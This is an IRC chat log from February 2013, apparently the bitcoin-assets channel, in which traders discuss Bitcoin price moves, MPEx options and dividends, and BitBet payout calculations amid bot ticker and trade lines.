30.19250, Bid-ask spread: 0.06909, Last trade: 30.19250, 24 hour volume: 67029.45874648, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.47874 Feb 23 03:49:11 nah Feb 23 03:50:01 we just need 50k USD to reach 31 dollars Feb 23 03:50:23 simple - if i went into midmarket fo calls, what reason anyone may have to buy my C750s, when C310s looks overall more profitable? Feb 23 03:51:28 i thought you were trying to buy them, so they'd be selling Feb 23 03:51:29 or ? Feb 23 03:51:59 yes i am buying some calls Feb 23 03:52:49 right. if we're talking the C750, you can buy one right now for 0.17, but the current highest bid on it is 2 satoshi. Feb 23 03:53:05 if anyone were to sell one, you might get it should you bid more than 2 satoshi. Feb 23 03:53:49 oh i understand now Feb 23 03:54:17 now, it may be the case some other option is better priced, sure Feb 23 03:54:28 but it all depends on how much this actually ends up trading for. Feb 23 03:56:33 that she blows Feb 23 03:56:36 thar Feb 23 03:56:36 hm, so someone might see my bid and decide to mkopt and sell the calls Feb 23 03:56:50 yes that could work, then Feb 23 03:57:26 question, is it possible to see dividend per share? Feb 23 03:57:33 sadly, bears were shot :) Feb 23 03:57:34 kinda the point of even having the books in the first place. Feb 23 03:57:37 Seems like it just shows total on MPEx Feb 23 03:57:54 and doesn't show the current outstanding paid to. Feb 23 03:57:59 maximian what blows ? Feb 23 03:58:09 Namworld hm ? Feb 23 03:58:20 ah, just the price dipped below 30 Feb 23 03:58:25 in other news, the uk just got its credit slashed. Feb 23 03:58:26 ;;ticker Feb 23 03:58:27 BTCUSD ticker | Best bid: 29.99001, Best ask: 29.99360, Bid-ask spread: 0.00359, Last trade: 29.99360, 24 hour volume: 66167.24997894, 24 hour low: 29.84413, 24 hour high: 31.30000, 24 hour vwap: 30.48630 Feb 23 03:58:30 Namworld, you have to find the float in the text and do the maths Feb 23 03:58:30 o i c Feb 23 03:58:48 Eh... Feb 23 03:58:51 and there is no such thing as "price per share" Feb 23 03:59:12 you'll end up with significant rounding error Feb 23 03:59:27 if you started with price per share in satoshis Feb 23 03:59:31 yeah... Feb 23 04:00:50 [MPEX] [S.DICE] 1550 @ 0.00574098 = 8.8985 BTC [+] Feb 23 04:01:00 I was planning using MPOE results/SD results statement to get the dividend info. Just not going to get rounded numbers tho. Feb 23 04:01:45 Namworld : Total shares : 1`000`000`000. Total dividend : 979.88886371 BTC. Feb 23 04:01:46 you can't use statjson output? Feb 23 04:01:47 it's all there neh ? Feb 23 04:01:47 0.00000097988886371 per S.MPOE this month Feb 23 04:01:52 yeah Feb 23 04:02:19 mircea_popescu, but the dividend there applies to float, not to all shares, no? Feb 23 04:02:23 So it multiplies that by amount of S.MPOE you have, and then what? Round it? Feb 23 04:02:40 jurov float = all shares! Feb 23 04:03:06 Namworld to the nearest satoshi Feb 23 04:03:20 aye Feb 23 04:04:15 I won't be able to do that since some people have just 1 share on my passthroughs Feb 23 04:04:43 Guess I'll round it to 0.00000098 per share Feb 23 04:05:05 I'll pay it right away Feb 23 04:08:56 Bugpowder, you went to gym and btc went crashing Feb 23 04:09:04 you did it again Feb 23 04:10:34 [MPEX] [S.MPOE] 4150 @ 0.00065717 = 2.7273 BTC [-] Feb 23 04:13:34 [MPEX] [S.MPOE] 171 @ 0.00065717 = 0.1124 BTC [-] Feb 23 04:13:36 [MPEX] [S.MPOE] 4774 @ 0.00065695 = 3.1363 BTC [-] Feb 23 04:14:14 ;;ticker Feb 23 04:14:15 BTCUSD ticker | Best bid: 29.70000, Best ask: 29.89000, Bid-ask spread: 0.19000, Last trade: 29.89000, 24 hour volume: 66974.83869919, 24 hour low: 29.68700, 24 hour high: 31.30000, 24 hour vwap: 30.47468 Feb 23 04:14:21 uh oh Feb 23 04:14:38 So a nice 94 sathoshi per share I'll be giving out. Feb 23 04:15:21 hmm... Feb 23 04:15:26 Seems off Feb 23 04:15:39 [MPEX] [S.MPOE] 3789 @ 0.00065695 = 2.4892 BTC [-] Feb 23 04:16:16 [MPEX] [S.MPOE] 6537 @ 0.00065695 = 4.2945 BTC [-] Feb 23 04:16:18 [MPEX] [S.MPOE] 2445 @ 0.00065201 = 1.5942 BTC [-] Feb 23 04:16:20 [MPEX] [S.MPOE] 2748 @ 0.00064255 = 1.7657 BTC [-] Feb 23 04:18:19 But it's not Feb 23 04:19:00 Damn Feb 23 04:19:10 ;;ticker Feb 23 04:19:11 BTCUSD ticker | Best bid: 29.66003, Best ask: 29.70000, Bid-ask spread: 0.03997, Last trade: 29.70000, 24 hour volume: 62456.87645939, 24 hour low: 29.66000, 24 hour high: 31.30000, 24 hour vwap: 30.50573 Feb 23 04:19:16 [MPEX] [S.MPOE] 170 @ 0.00063694 = 0.1083 BTC [-] Feb 23 04:19:17 Would take 600 months to break even at that pace O.o Feb 23 04:19:25 I cant bear to watch.. Feb 23 04:19:33 Or 50 years... Feb 23 04:19:47 lol this breakeven nonsense. Feb 23 04:20:21 The pace at which profits come in matters Feb 23 04:20:35 looky, this isn't how stocks work, "break even from dividends". Feb 23 04:20:52 it's so nonsensical as to leave no room for words. Feb 23 04:21:02 hehe Feb 23 04:21:53 The breakeven doesn't necessarily matter, but the % matter Feb 23 04:22:29 yeah. about what a normal corp does, give or take. Feb 23 04:23:49 aye Feb 23 04:23:59 like 2% per year Feb 23 04:24:43 [BTCTC] [BASIC-MINING] 11 @ 0.35 = 3.85 BTC [+] Feb 23 04:24:52 Normally you also want enough price share value increase to beat inflation... tho... since this is BTC. Feb 23 04:25:25 [MPEX] [S.MPOE] 11730 @ 0.00065548 = 7.6888 BTC [+] Feb 23 04:25:26 [MPEX] [S.MPOE] 8600 @ 0.00063609 = 5.4704 BTC [-] Feb 23 04:25:28 [MPEX] [S.MPOE] 1416 @ 0.00063422 = 0.8981 BTC [-] Feb 23 04:25:29 [MPEX] [S.MPOE] 2384 @ 0.00063298 = 1.509 BTC [-] Feb 23 04:26:49 in fairness the entire "break even" stuff probably comes from the very fly-by-night nature of many btc businesses. Feb 23 04:27:10 if stuff is just going to dissapear one day a la gblse then you want to know how long you need. Feb 23 04:30:58 Actually I think it's more due to the deflationary nature of Bitcoin. Once you get back your investment amount, you win no matter what. Compared to inflationary currencies where you need to breakeven AND beat inflation. Feb 23 04:31:31 In BTC, reaching breakeven point is more interesting as you got all initial BTC back and still have assets. Feb 23 04:32:06 that's a point. Feb 23 04:32:21 i guess from a psychological pov this "breakeven" is a lot more appealing here. Feb 23 04:35:54 Time 4 puts Feb 23 04:35:59 [MPEX] [X.IDIFF.MAR] 25 @ 0.07595 = 1.8988 BTC [+] Feb 23 04:36:07 Yay! Feb 23 04:41:37 Don't forget to sleep with that & speakers @ full power: http://namcdn.com/btcalarm/ Feb 23 04:46:17 Is there other stuff in JSON format other than vwap? Feb 23 04:52:05 [MPEX] [S.MPOE] 4321 @ 0.00064725 = 2.7968 BTC [+] Feb 23 04:52:07 [MPEX] [S.MPOE] 9975 @ 0.00064727 = 6.4565 BTC [+] Feb 23 04:53:36 [BTCTC] [GSDPT] 5 @ 0.0056 = 0.028 BTC [-] Feb 23 04:53:49 http://mpex.co/faq.html#11 Feb 23 04:58:24 ;;ticker Feb 23 04:58:25 BTCUSD ticker | Best bid: 29.67445, Best ask: 29.89899, Bid-ask spread: 0.22454, Last trade: 29.91474, 24 hour volume: 60390.33320751, 24 hour low: 29.51001, 24 hour high: 31.30000, 24 hour vwap: 30.49060 Feb 23 05:08:29 [MPEX] [S.MPOE] 33450 @ 0.00064727 = 21.6512 BTC [+] Feb 23 05:15:07 ;;ticker Feb 23 05:15:07 BTCUSD ticker | Best bid: 29.71000, Best ask: 29.87182, Bid-ask spread: 0.16182, Last trade: 29.87187, 24 hour volume: 59467.92459786, 24 hour low: 29.51001, 24 hour high: 31.30000, 24 hour vwap: 30.49554 Feb 23 05:23:20 [MPEX] [S.MPOE] 4321 @ 0.00064374 = 2.7816 BTC [-] Feb 23 05:23:22 [MPEX] [S.MPOE] 2879 @ 0.00064354 = 1.8528 BTC [-] Feb 23 05:27:02 [MPEX] [S.DICE] 200 @ 0.0060899 = 1.218 BTC [+] Feb 23 05:29:13 [MPEX] [S.MPOE] 4321 @ 0.0006437 = 2.7814 BTC [+] Feb 23 05:29:15 [MPEX] [S.MPOE] 329 @ 0.00064354 = 0.2117 BTC [-] Feb 23 05:29:18 Oh, its just the weekend dip Feb 23 05:29:21 ;;ticker Feb 23 05:29:22 BTCUSD ticker | Best bid: 29.57640, Best ask: 29.78699, Bid-ask spread: 0.21059, Last trade: 29.78699, 24 hour volume: 62404.68197545, 24 hour low: 29.40000, 24 hour high: 31.30000, 24 hour vwap: 30.44704 Feb 23 05:33:42 [MPEX] [O.BTCUSD.P290T] 1000 @ 0.2535436 = 253.5436 BTC Feb 23 05:34:26 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 23 05:34:48 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.13112771 = 131.1277 BTC [+] Feb 23 05:38:20 [MPEX] [S.MPOE] 4321 @ 0.0006472 = 2.7966 BTC [+] Feb 23 05:38:22 [MPEX] [S.MPOE] 8579 @ 0.00064727 = 5.5529 BTC [+] Feb 23 05:38:32 DIVE Feb 23 05:39:27 [MPEX] [O.BTCUSD.P270T] 1000 @ 0.20866429 = 208.6643 BTC Feb 23 05:39:36 tora tora tora Feb 23 05:52:15 ;;ticker Feb 23 05:52:15 BTCUSD ticker | Best bid: 28.52500, Best ask: 28.55000, Bid-ask spread: 0.02500, Last trade: 28.55000, 24 hour volume: 69282.32487470, 24 hour low: 28.50000, 24 hour high: 31.30000, 24 hour vwap: 30.29200 Feb 23 05:52:25 WOuch Feb 23 05:53:51 yeahhh Feb 23 05:53:52 puts Feb 23 05:53:53 time Feb 23 05:54:01 ;;bids 27 Feb 23 05:54:03 There are currently 18764.874 bitcoins demanded at or over 27.0 USD, worth 518424.477915 USD in total. Feb 23 05:54:20 its the weekend Feb 23 05:54:22 ;;bids 23 Feb 23 05:54:24 There are currently 49713.014 bitcoins demanded at or over 23.0 USD, worth 1299105.90195 USD in total. Feb 23 05:54:48 [BTCTC] [COGNITIVE] 1 @ 0.3079 BTC [+] Feb 23 05:55:56 ;;ticker Feb 23 05:55:57 BTCUSD ticker | Best bid: 28.75000, Best ask: 28.88900, Bid-ask spread: 0.13900, Last trade: 28.75000, 24 hour volume: 69845.63623394, 24 hour low: 28.50000, 24 hour high: 31.30000, 24 hour vwap: 30.27773 Feb 23 05:56:01 tsk tsk Feb 23 05:56:10 ;;bids 28 Feb 23 05:56:12 There are currently 8077.8395 bitcoins demanded at or over 28.0 USD, worth 226780.134991 USD in total. Feb 23 05:57:43 tank tank tank Feb 23 05:58:10 BTFD Feb 23 05:58:11 lol Feb 23 06:01:15 ;;bc,stats Feb 23 06:01:17 Current Blocks: 222639 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1136 blocks | Next Difficulty In About: 6 days, 10 hours, 54 minutes, and 32 seconds | Next Difficulty Estimate: 4348149.60774 | Estimated Percent Change: 19.09438 Feb 23 06:01:35 we have support at 28 BTC per according to chart Feb 23 06:03:45 ;;ticker Feb 23 06:03:45 BTCUSD ticker | Best bid: 28.81000, Best ask: 28.90000, Bid-ask spread: 0.09000, Last trade: 28.90000, 24 hour volume: 70433.13541352, 24 hour low: 28.50000, 24 hour high: 31.30000, 24 hour vwap: 30.26478 Feb 23 06:03:47 i bought puts we will probably bounce Feb 23 06:03:57 I can't bear to watch!! :/ Feb 23 06:03:58 though... it is the weekend. Feb 23 06:03:58 here she comes Feb 23 06:09:30 ;;ticker Feb 23 06:09:31 BTCUSD ticker | Best bid: 29.02760, Best ask: 29.45669, Bid-ask spread: 0.42909, Last trade: 28.81000, 24 hour volume: 71487.83150458, 24 hour low: 28.50000, 24 hour high: 31.30000, 24 hour vwap: 30.25031 Feb 23 06:09:35 lol Feb 23 06:09:37 Fuck that Feb 23 06:10:03 I swear to Satoshi.. the marker is playing tricks on me Feb 23 06:11:24 [MPEX] [S.MPOE] 4321 @ 0.00064704 = 2.7959 BTC [-] Feb 23 06:11:26 [MPEX] [S.MPOE] 6879 @ 0.00064727 = 4.4526 BTC [+] Feb 23 06:13:01 tank tank tank Feb 23 06:13:02 please Feb 23 06:13:46 nO! Feb 23 06:14:00 I forbid the market to tank Feb 23 06:14:39 isnt options trading gambling? Feb 23 06:18:06 [MPEX] [S.MPOE] 35700 @ 0.00064727 = 23.1075 BTC [+] Feb 23 06:19:13 !ticker m s.mpoe Feb 23 06:19:14 [MPEX:S.MPOE] 1D: 0.00063035 / 0.00064332 / 0.00066013 (1620421 shares, 1,042.45 BTC), 7D: 0.000622 / 0.00064857 / 0.00068894 (10946689 shares, 7,099.72 BTC), 30D: 0.00059613 / 0.00066506 / 0.0007 (72643562 shares, 48,312.69 BTC) Feb 23 06:20:39 nobody can fund accounts for the next 48 hours though Feb 23 06:20:44 a good time for a crash Feb 23 06:20:49 please Feb 23 06:21:09 O_o Feb 23 06:22:24 [MPEX] [S.MPOE] 4321 @ 0.00064366 = 2.7813 BTC [-] Feb 23 06:22:25 [MPEX] [S.MPOE] 329 @ 0.00064354 = 0.2117 BTC [-] Feb 23 06:22:32 here comes another dump Feb 23 06:23:11 but there so exspensive right now at one time i was getting them for 25 a pop Feb 23 06:23:15 quote Feb 23 06:24:22 [MPEX] [S.MPOE] 4321 @ 0.00064361 = 2.781 BTC [+] Feb 23 06:24:24 [MPEX] [S.MPOE] 3329 @ 0.00064354 = 2.1423 BTC [-] Feb 23 06:27:06 I actually have a lot of USD on gox right now Feb 23 06:27:13 but I don't want to support the price :-P Feb 23 06:27:32 [MPEX] [S.MPOE] 1110 @ 0.00064354 = 0.7143 BTC [-] Feb 23 06:30:01 28 is gonna be tough to break thru though Feb 23 06:32:18 The reddit sentiment index is turning bearish though Feb 23 06:32:47 http://www.reddit.com/r/Bitcoin/new/ Feb 23 06:33:01 [MPEX] [S.MPOE] 4321 @ 0.00064724 = 2.7967 BTC [+] Feb 23 06:33:03 [MPEX] [S.MPOE] 12522 @ 0.00064727 = 8.1051 BTC [+] Feb 23 06:35:01 [MPEX] [O.BTCUSD.P230T] 1000 @ 0.13112771 = 131.1277 BTC [+] what srsly ?! Feb 23 06:35:03 [MPEX] [S.MPOE] 3300 @ 0.00064374 = 2.1243 BTC [-] Feb 23 06:35:16 yeah Feb 23 06:35:18 twas me Feb 23 06:35:30 one of these times its gonna pay off Feb 23 06:35:39 under 23 ?! Feb 23 06:35:46 well Feb 23 06:35:54 it doesnt have to hit 23 to make money on it Feb 23 06:36:02 ;;ticker Feb 23 06:36:02 BTCUSD ticker | Best bid: 28.50000, Best ask: 28.50009, Bid-ask spread: 0.00009, Last trade: 28.50009, 24 hour volume: 73966.60498852, 24 hour low: 28.50000, 24 hour high: 31.30000, 24 hour vwap: 30.20182 Feb 23 06:36:35 the 23s might have been a bit excessive, admittedly Feb 23 06:36:44 :p Feb 23 06:36:55 wtf reddit sentiment index. Feb 23 06:37:25 lol Feb 23 06:37:26 reddit matters too Feb 23 06:37:27 yeah Feb 23 06:37:29 well Feb 23 06:37:30 ya tiotally matters Feb 23 06:37:34 ya, inverse that and use it to trade Feb 23 06:37:39 millions. Feb 23 06:37:41 this run up has been the reddit crowd driven Feb 23 06:37:46 I think Feb 23 06:37:48 it's like doing an index of somali pirates manufactured goods purchasing plans Feb 23 06:38:03 meh Feb 23 06:38:09 maybe I am delusional Feb 23 06:38:39 dude, the reddit crowd has an aggregated 18 dollars in disposable income. Feb 23 06:38:44 :D Feb 23 06:38:44 and there's like what, 100k of them ? Feb 23 06:39:13 uh Feb 23 06:39:15 huh Feb 23 06:39:19 thats a lot of money Feb 23 06:39:27 almost two whole pizzas. Feb 23 06:39:46 so like over 10k btc Feb 23 06:40:13 ;;calc 18 * 100000 / 28 Feb 23 06:40:14 64285.7142857 Feb 23 06:40:23 6 and a half pizzas Feb 23 06:40:25 btw, all this talk of bitcoin subdivisions is for the newbs. the pizza is the one unit of bitcoin wealth. sorta like fiat millionaire. Feb 23 06:40:46 someone's pushing the price down methinks Feb 23 06:40:52 yes but now 1 bitcoin buys 2 pizzas Feb 23 06:40:53 i now see the wisdom of pizzaman1337's name Feb 23 06:41:00 [MPEX] [S.MPOE] 1021 @ 0.00064374 = 0.6573 BTC [-] Feb 23 06:41:02 [MPEX] [S.MPOE] 5579 @ 0.00064354 = 3.5903 BTC [-] Feb 23 06:41:17 hehe Feb 23 06:42:06 jcpham: heh dude Feb 23 06:42:16 jcpham: they had a sale of $4.99 pizzas here Feb 23 06:42:21 frozen ones that are normally like $10 Feb 23 06:42:31 they said large, they were really closer to medium Feb 23 06:42:38 they were surprisingly good for frozen Feb 23 06:42:54 so 1 btc buys an entire week of dinner Feb 23 06:43:22 ;;bids 28 Feb 23 06:43:24 There are currently 9089.5697 bitcoins demanded at or over 28.0 USD, worth 255454.402077 USD in total. Feb 23 06:43:29 [MPEX] [S.MPOE] 4321 @ 0.00064711 = 2.7962 BTC [+] Feb 23 06:43:31 [MPEX] [S.MPOE] 479 @ 0.00064727 = 0.31 BTC [+] Feb 23 06:43:36 ;;asks 30 Feb 23 06:43:38 There are currently 2412.2888 bitcoins offered at or under 30.0 USD, worth 70658.6301887 USD in total. Feb 23 06:44:14 [23:40] i now see the wisdom of pizzaman1337's name lol Feb 23 06:44:31 ;;bids 0 Feb 23 06:44:33 There are currently 37067587 bitcoins demanded at or over 0.0 USD, worth 3517373.93318 USD in total. Feb 23 06:44:41 ;;bids .9 Feb 23 06:44:41 ;;asks 999999999 Feb 23 06:44:42 There are currently 304891.96 bitcoins demanded at or over 0.9 USD, worth 3475777.04152 USD in total. Feb 23 06:44:44 There are currently 74166.811 bitcoins offered at or under 999999999.0 USD, worth 2300089391.95 USD in total. Feb 23 06:45:04 stop spaming Diablo-D3 Feb 23 06:45:14 er? Feb 23 06:45:20 some of those were Bugpowders Feb 23 06:45:29 and mod6s Feb 23 06:45:35 yes, but yours were the stupid ones Feb 23 06:45:48 [MPEX] [S.MPOE] 4321 @ 0.00064713 = 2.7962 BTC [-] Feb 23 06:45:49 not at all, Im asking for the entire market depth in both directions Feb 23 06:45:49 [MPEX] [S.MPOE] 829 @ 0.00064727 = 0.5366 BTC [+] Feb 23 06:46:21 meh Feb 23 06:46:23 useless Feb 23 06:46:29 to you, maybe Feb 23 06:46:32 I find it interesting Feb 23 06:56:36 ;;ticker Feb 23 06:56:36 BTCUSD ticker | Best bid: 28.30166, Best ask: 28.99800, Bid-ask spread: 0.69634, Last trade: 28.30166, 24 hour volume: 75390.89745049, 24 hour low: 28.30166, 24 hour high: 31.30000, 24 hour vwap: 30.15433 Feb 23 07:02:46 [MPEX] [S.MPOE] 14700 @ 0.00064727 = 9.5149 BTC [+] Feb 23 07:06:27 ;;ticker Feb 23 07:06:27 BTCUSD ticker | Best bid: 28.42002, Best ask: 28.65000, Bid-ask spread: 0.22998, Last trade: 28.67900, 24 hour volume: 75429.09520144, 24 hour low: 28.30166, 24 hour high: 31.30000, 24 hour vwap: 30.14941 Feb 23 07:06:41 i think im fainting Feb 23 07:08:16 o lala check the gap Feb 23 07:08:30 http://www.reddit.com/r/Bitcoin/comments/18o1kl/bitcoin_is_going_to_plummet_this_friday/ Feb 23 07:08:41 ;;ticker Feb 23 07:08:42 BTCUSD ticker | Best bid: 28.63311, Best ask: 28.66000, Bid-ask spread: 0.02689, Last trade: 28.66000, 24 hour volume: 75515.13424352, 24 hour low: 28.30166, 24 hour high: 31.30000, 24 hour vwap: 30.14770 Feb 23 07:09:44 lmao the bs. Feb 23 07:09:57 "I'm an intern @ a hedge fund and they have been heavily investing in btc recently. We re set to stagger sell and close all our positions next week, over 6.5 million worth of btc will ensue a massive crash. Just givin fair warning so afterwards I can get credit for calling it. 18GuUNbzyifszKpBtp18cH4UsmH2EVeyG3" Feb 23 07:10:00 ahaha Feb 23 07:10:16 lol Feb 23 07:10:28 truly a repository of the retarded. Feb 23 07:10:46 [MPEX] [S.MPOE] 5845 @ 0.00064354 = 3.7615 BTC [-] Feb 23 07:10:48 [MPEX] [S.MPOE] 4321 @ 0.00064286 = 2.7778 BTC [-] Feb 23 07:10:49 [MPEX] [S.MPOE] 1234 @ 0.00064285 = 0.7933 BTC [-] Feb 23 07:10:52 SEND ME COINZ KTHX BYE Feb 23 07:10:59 there's a quote this reminds me of. Feb 23 07:11:24 back in 2011 some noob joined irc and was like "anonymous will hack bitcoin uness you send me bitcoins" Feb 23 07:11:45 haha, i want to say that I remember that. Feb 23 07:12:16 lemme see mebbe i have it logged Feb 23 07:15:23 meh nothing easy pops it Feb 23 07:15:59 im trying to remember who it was... Feb 23 07:16:08 and im off. take care all Feb 23 07:16:11 night **** BEGIN LOGGING AT Sat Feb 23 14:52:30 2013 Feb 23 14:53:25 ;;ticker Feb 23 14:53:26 BTCUSD ticker | Best bid: 28.70001, Best ask: 28.88988, Bid-ask spread: 0.18987, Last trade: 28.88988, 24 hour volume: 74279.87605875, 24 hour low: 28.30166, 24 hour high: 31.30000, 24 hour vwap: 29.97270 Feb 23 14:53:30 o noes! Feb 23 14:54:19 o yes! Feb 23 14:54:23 ohhh yesssss Feb 23 14:54:25 [MPEX] [S.MPOE] 4321 @ 0.0006356 = 2.7464 BTC [-] Feb 23 14:54:27 [MPEX] [S.MPOE] 7979 @ 0.00063556 = 5.0711 BTC [-] Feb 23 14:54:36 FRANK THE TANK FRANK THE TANK! Feb 23 14:54:38 but it's below historical max ;/ Feb 23 14:55:02 [MPEX] [S.MPOE] 4321 @ 0.00063586 = 2.7476 BTC [+] Feb 23 14:55:05 [MPEX] [S.MPOE] 6867 @ 0.00063556 = 4.3644 BTC [-] Feb 23 15:15:59 [MPEX] [S.MPOE] 5747 @ 0.00064572 = 3.711 BTC [+] Feb 23 15:19:00 [MPEX] [S.DICE] 858 @ 0.00597078 = 5.1229 BTC [-] Feb 23 15:21:02 [MPEX] [S.MPOE] 2553 @ 0.00064572 = 1.6485 BTC [+] Feb 23 15:21:04 [MPEX] [S.MPOE] 6147 @ 0.00063556 = 3.9068 BTC [-] Feb 23 15:30:38 [MPEX] [S.MPOE] 6001 @ 0.00063556 = 3.814 BTC [-] Feb 23 15:30:40 [MPEX] [S.MPOE] 2167 @ 0.00063516 = 1.3764 BTC [-] Feb 23 15:34:21 very boring correction so far Feb 23 15:34:34 hey namworld Feb 23 15:35:02 hey Feb 23 15:35:33 boring correction so far Feb 23 15:35:40 i was waiting for 27 Feb 23 15:37:14 back to 17 Feb 23 15:37:17 lets do this Feb 23 15:37:28 mjr_: Feb 23 15:37:34 buy some puts, it will be more exciting Feb 23 15:37:43 lol Feb 23 15:37:52 i kinda doubt it Feb 23 15:38:12 eh Feb 23 15:38:37 ya srsly. 17 ?! Feb 23 15:39:00 I doubt we'll see 17 Feb 23 15:40:05 stranger things have happened, but i kinda don't see it either. Feb 23 15:41:00 don't make me draw some lines on a chart Feb 23 15:41:04 I will do it Feb 23 15:43:30 It's a long options month Feb 23 15:43:32 lol Feb 23 15:43:40 mircea_popescu: how to calculate bitbet winning Feb 23 15:43:46 i read your article about it Feb 23 15:44:04 35 days Feb 23 15:44:25 "LOL Well, then maybe he felt frustrated and powerless because reporting me to the police if that becomes desirable would be meaningless and inconsequential as they're already beating the poop out of me and/or arresting me approximately every 6 weeks – last time on January 17, 2013 CET when I was intercepted and arrested by Služba općeg kriminaliteta, terorizma i ratnih zločina – the General Criminality, Terrori Feb 23 15:44:25 sm, and War Crimes Service – of the Republic of Croatia on charges of possession of, and/or having planted, explosives – so even if he reported me for e.g. nuclear terrorism, nothing new would happen. It would be interesting if he could get Antiteroristička jedinica "Lučko" – the "Lučko" Anti-Terrorist Unit – to attack my position in full combat gear to see if I would get startled as I've not yet had an enco Feb 23 15:44:25 unter with them." Feb 23 15:44:27 jessu the forum ?! Feb 23 15:44:28 you didnt tell how you actually calculate them, just throwing numbers around. so mp: how to do it Feb 23 15:44:34 Anduck well listen Feb 23 15:44:47 your bet has a btc value and a weight value, right ? Feb 23 15:44:47 r u serious Feb 23 15:44:52 yes yes Feb 23 15:44:54 Bugpowder kid's prolly weak at math. Feb 23 15:45:05 Anduck and the bet has a total BTC pool and a total weight for the winning side, right ? Feb 23 15:45:08 this is like 4th grade calculus Feb 23 15:45:12 in fact, i am at uni and i aint even bad at maths :D Feb 23 15:45:26 ok ok, just follow it's really simple, i'ma explain it. Feb 23 15:45:26 its just poor describing by mircea popescu at that article, really. Feb 23 15:45:32 Anduck focus! Feb 23 15:45:49 just tell me the way to use the weight var Feb 23 15:45:55 ok let's work an example. Feb 23 15:46:04 it would work this way better: Feb 23 15:46:07 Can I win bitcoins in the example Feb 23 15:46:09 http://bitbet.us/bet/46/gold-price-remains-below-1750-usd-oz-until-mid-february/ look at this one. Feb 23 15:46:12 A bets 1 BTC on winning side at weight of 100`000. B bets 1 BTC on winning side at weight of 50`000. C bets 10 BTC on losing side. Feb 23 15:46:12 Total bet is 12 BTC, so BitBet takes 0.12 BTC. The remainder 9.88 BTC is split according to weight : A gets 1 + 6.58666666 = 7.58666666 and B gets 1 + 3.29333333 = 4.29333333 BTC. Feb 23 15:46:19 where does those nuumbers come from? Feb 23 15:46:30 just tell me that and i get it :) Feb 23 15:46:36 anduck. shut up for a moment and listen to me. Feb 23 15:46:47 go to http://bitbet.us/bet/46/gold-price-remains-below-1750-usd-oz-until-mid-february/ and look at it. Feb 23 15:46:49 fine Feb 23 15:46:55 yea Feb 23 15:46:57 see where it says 04-02-13 15:49 Yes 16`070 1.15000000 ? Feb 23 15:47:19 yups Feb 23 15:47:27 ok. that person bet 1.15 btc and the weight was 16070. Feb 23 15:47:36 yes Feb 23 15:47:41 now, the total bet pool is 0.48 + 3.15 Feb 23 15:47:45 ;;calc 0.48 + 3.15 Feb 23 15:47:45 3.63 Feb 23 15:47:52 and 0.48 of that gets divided, right Feb 23 15:48:03 see where it says Weighted Yes: 90`361 ? Feb 23 15:48:11 yes Feb 23 15:48:30 ok. so our guy's weight is Feb 23 15:48:38 ;;calc 1.15 * 16070 Feb 23 15:48:39 18480.5 Feb 23 15:48:39 lost bets / bet Feb 23 15:48:45 lost bets / (bet*weight) ? Feb 23 15:49:02 lost bets / bet (weight / total weight) Feb 23 15:49:24 "total weight" being the weighted yes/no ? Feb 23 15:49:32 either yes or no as the case may be Feb 23 15:49:35 yep Feb 23 15:49:39 ok i'll try this Feb 23 15:49:39 in our case the 90361 Feb 23 15:49:43 go ahead. Feb 23 15:50:23 Bugpowder have you won any bitcoins ? Feb 23 15:51:44 (lost bets / bet) * (weight / total weight) ? Feb 23 15:51:56 hmm Feb 23 15:52:52 watch him find a bug now Feb 23 15:52:58 so we can all facepalm Feb 23 15:53:21 stfu Feb 23 15:53:25 no u Feb 23 15:53:34 NO U Feb 23 15:53:45 why's the bot talking out of its ass ? Feb 23 15:54:00 these are farts that have phonetics Feb 23 15:54:16 you know one of those days you'll have to fix that leading space bug you got there :D Feb 23 15:54:25 well i still seem to fail this somehow :_: Feb 23 15:54:34 ill try again later =) Feb 23 15:54:38 thanks for trying, mp Feb 23 15:54:41 np. Feb 23 15:54:50 thats why i'm called mp btw. it's really close to np Feb 23 15:54:52 where is a leading space? Feb 23 15:54:57 just more lines in it. Feb 23 15:54:57 lol mp Feb 23 15:55:51 kakobrekla [ ]NO U Feb 23 15:55:56 hm Feb 23 15:56:16 strange, apparently my local client cleans it up Feb 23 15:56:19 ill fix. Feb 23 15:57:53 https://bitcointalk.org/index.php?topic=144335.0;all lol this escalated quickly. Feb 23 16:02:05 so you think we'll drop much more this weekend? Feb 23 16:03:36 I think we might just resume back upward... Feb 23 16:04:48 ok. I sold 50 at 30.4 I just rebought them. Feb 23 16:04:53 :) Feb 23 16:05:06 My advice is not sound financial advice... Feb 23 16:05:33 i did not take it so, I made the purchase already, before your opinion Feb 23 16:05:51 plus, I got all my money out already. Feb 23 16:05:53 Alright then Feb 23 16:05:55 it's all profit I'm playing with Feb 23 16:06:40 DeadWeasel: you bought TOO SOON Feb 23 16:06:49 Should have waited till Sunday afternoon Feb 23 16:06:54 good point Feb 23 16:07:04 possible rally sunday night when wires start getting funded Feb 23 16:07:15 mircea_popescu: I have won MANY bitcoins Feb 23 16:07:27 also... the BFL bet should be paying me out soon. Feb 23 16:07:34 me to0! Feb 23 16:07:44 if there is a rally sunday night then I bought at the right time, now? Feb 23 16:07:51 [MPEX] [S.MPOE] 4321 @ 0.00064706 = 2.7959 BTC [+] Feb 23 16:07:53 [MPEX] [S.MPOE] 9079 @ 0.00064727 = 5.8766 BTC [+] Feb 23 16:07:58 OK FOLKS, I called the last rally and bought calls to back up the predictions a month ago. Now I'm calling the crash and have puts to back it up. Feb 23 16:08:00 now is a great time to buy Feb 23 16:08:04 OFFICIAL PREDICTION Feb 23 16:08:04 http://i.imgur.com/AHWri8B.png Feb 23 16:08:07 LOL Feb 23 16:08:09 if you want to cash out sunday Feb 23 16:08:10 night Feb 23 16:08:36 ---exclusive to bitcoin-assets memebers--- Feb 23 16:09:04 Why, you think next week will be a dead flat volume week? Feb 23 16:09:26 steady media should keep us afloat, just wanted to reup in the weekend lull Feb 23 16:09:28 A great time to buy is around $15. Feb 23 16:09:32 ahaha Feb 23 16:09:35 I bought most then Feb 23 16:10:04 but i'm trying to sell high and buy low now, which is fucking impossible int his market Feb 23 16:10:07 brb Feb 23 16:10:14 i should of doubled flip this weekend, but the time differnce messes me up Feb 23 16:10:27 have Feb 23 16:10:51 [MPEX] [S.MPOE] 4321 @ 0.00064695 = 2.7955 BTC [-] Feb 23 16:10:53 [MPEX] [S.MPOE] 5579 @ 0.00064727 = 3.6111 BTC [+] Feb 23 16:11:07 !ticker m s.mpoe Feb 23 16:11:09 